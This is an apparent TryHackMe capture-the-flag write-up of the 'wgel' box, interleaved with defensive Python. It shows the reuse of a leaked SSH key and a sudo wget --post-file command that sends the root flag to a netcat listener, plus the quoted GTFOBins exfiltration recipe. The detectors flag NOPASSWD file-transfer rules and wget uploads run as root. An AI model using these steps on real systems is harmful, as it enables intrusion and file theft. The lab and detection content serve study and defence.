Can you exfiltrate the root flag?

Dunno, but since this is an easy-rated box I give myself a fighting chance. Let’s begin.


nmap says we’ve got 22 (SSH) and 80 (HTTP) only.


The homepage for the website is just the Apache default page, with one exception - a comment for Jessie. So perhaps that’s our username.

Gobuster is a place to start:

root@kali:/opt/tryhackme/wgel# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

This turns up one interesting directory - sitemap. Checking that we get a whole host of pages; basically an incomplete blog/business site. It’s called unapp, but that doesn’t turn up anything on searchsploit, so let’s gobuster in the sitemap directory:

root@kali:/opt/tryhackme/wgel# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

Doing that, we find .ssh/id_rsa. Bingo.


Once we’ve downloaded the ssh key, we can chmod 600 it and then login:

root@kali:/opt/tryhackme/wgel# ssh -i id_rsa jessie@

Then we run sudo -l:

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget


Jessie has got the user flag, and we can run wget as root. What can we do with that? Well, the box hint was about exfiltrating the root flag.
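The `sudo -l` output above is the whole privilege-escalation story: a NOPASSWD rule that lets a low-privilege user run a file-transfer tool as root. As an added example (not part of the original walkthrough, and not the box's own tooling), here is a small Python audit that parses that output and flags exactly this class of rule. The list of "file-transfer" binaries is an assumption on my part and is deliberately short; GTFOBins is the fuller catalogue.

```python
import os
import re

# Sample input: the `sudo -l` output shown in the walkthrough, embedded as a raw
# string so the escaped colons in secure_path survive untouched.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
"""

# Binaries whose normal job is reading or sending arbitrary files. Granting one of
# them as root with NOPASSWD hands over every file root can read.
# Assumption: this list is illustrative, not exhaustive.
FILE_TRANSFER_BINARIES = {"wget", "curl", "nc", "ncat", "scp", "rsync", "tar", "cp", "base64"}

# One sudoers rule line: "(runas) TAG: TAG: /path/cmd, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_rules(text):
    """Turn `sudo -l` output into one dict per command: runas, tags, command."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        # A single rule can list several commands separated by commas.
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return rules


def find_risky_rules(rules):
    """Return rules that run a file-transfer tool (or anything at all) as root without a password."""
    findings = []
    for r in rules:
        if "NOPASSWD" not in r["tags"]:
            continue
        runs_as_root = r["runas"] in ("root", "ALL") or r["runas"].startswith(("root ", "ALL "))
        binary = os.path.basename(r["command"].split()[0])
        if runs_as_root and (r["command"] == "ALL" or binary in FILE_TRANSFER_BINARIES):
            findings.append(r)
    return findings


if __name__ == "__main__":
    for f in find_risky_rules(parse_sudo_rules(SUDO_L_OUTPUT)):
        print(f"RISK: ({f['runas']}) NOPASSWD {f['command']} can read or send files as root")
```

Run against the box's output it reports only the wget rule: the `(ALL : ALL) ALL` line still needs jessie's password, so it is not the path this walkthrough uses. The fix on a real host is simply to delete the NOPASSWD entry; if unattended downloads are genuinely needed, run them under a dedicated service account rather than as root.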

GTFOBins says we can exfiltrate files:

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use --post-data to send hard-coded data.

wget --post-file=$LFILE $URL

So let’s try that:

jessie@CorpOne:/$ URL=  
jessie@CorpOne:/$ LFILE=/root/root_flag.txt  
jessie@CorpOne:/$ sudo wget --post-file=$LFILE $URL  
--2020-08-07 07:02:51--  
Connecting to connected.  

And on the receiving end I used netcat:

root@kali:/opt/tryhackme/wgel# nc -nvlp 1234  
Ncat: Version 7.80 ( )  
Ncat: Listening on :::1234  
Ncat: Listening on  
Ncat: Connection from  
Ncat: Connection from  
POST / HTTP/1.1  
User-Agent: Wget/1.17.1 (linux-gnu)  
Accept: */*  
Accept-Encoding: identity  
Connection: Keep-Alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 33
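The listener side shows what the exfiltration looks like on the wire; on the host, every one of these sudo invocations is also written to the auth log. As an added example from the defender's side (not from the original post), here is a Python scanner that reads sudo's syslog lines and alerts on elevated wget runs using --post-file or --post-data, the two options from the GTFOBins entry quoted above. The log lines are constructed for this example (hostname, paths, the 10.0.0.5 address and timestamps are all made up); the line format is the one sudo writes by default, and the space-separated option form (`--post-file FILE`) is handled as well as `--post-file=FILE`.

```python
import os
import re
import shlex

# Constructed sample auth.log lines in the syslog format sudo writes. Nothing here
# comes from the box in the walkthrough; the one sshd line is a non-sudo control.
SAMPLE_AUTH_LOG = """\
Aug  7 07:01:10 CorpOne sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget http://mirror.example/patch.tgz
Aug  7 07:02:51 CorpOne sudo:   jessie : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.0.0.5:1234/
Aug  7 07:03:00 CorpOne sudo:   jessie : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/wget --post-data=a=1 http://10.0.0.5:1234/
Aug  7 07:04:12 CorpOne sshd[1201]: Accepted publickey for jessie from 10.0.0.5 port 50112 ssh2
"""

# sudo's audit line: "sudo:   user : TTY=... ; PWD=... ; USER=runas ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# wget options that push local content to the remote side (both named in the GTFOBins entry).
UPLOAD_OPTIONS = ("--post-file", "--post-data")


def parse_sudo_line(line):
    """Return the fields of a sudo audit line, or None for any other line."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def extract_upload(args):
    """Return (option, value) for the first upload option in wget's arguments, else None."""
    for i, a in enumerate(args):
        for opt in UPLOAD_OPTIONS:
            if a == opt and i + 1 < len(args):      # "--post-file FILE"
                return opt, args[i + 1]
            if a.startswith(opt + "="):             # "--post-file=FILE"
                return opt, a.split("=", 1)[1]
    return None


def detect_wget_exfil(lines):
    """Flag sudo-elevated wget invocations that send data to a remote URL."""
    alerts = []
    for line in lines:
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        try:
            argv = shlex.split(rec["cmd"])
        except ValueError:
            continue  # unbalanced quotes: skip the line rather than crash the scanner
        if not argv or os.path.basename(argv[0]) != "wget":
            continue
        upload = extract_upload(argv[1:])
        if upload is None:
            continue
        opt, value = upload
        urls = [a for a in argv[1:] if not a.startswith("-") and a != value]
        posted_file = value if opt == "--post-file" else None
        alerts.append({
            "user": rec["user"],
            "runas": rec["runas"],
            "file": posted_file,
            "url": urls[0] if urls else None,
            # A local file leaving the host as root is the case that matters most.
            "severity": "high" if posted_file else "medium",
            "line": line.strip(),
        })
    return alerts


if __name__ == "__main__":
    for a in detect_wget_exfil(SAMPLE_AUTH_LOG.splitlines()):
        print(f"[{a['severity']}] {a['user']} as {a['runas']} sent "
              f"{a['file'] or 'inline data'} to {a['url']}")
```

On the sample it raises two alerts and stays quiet on the plain download, which is the point: the wget binary itself is not the signal, the combination of root privileges and an upload option is. Shipping auth.log to a central collector matters here, since a user who can run wget as root has no shortage of ways to tamper with local logs afterwards.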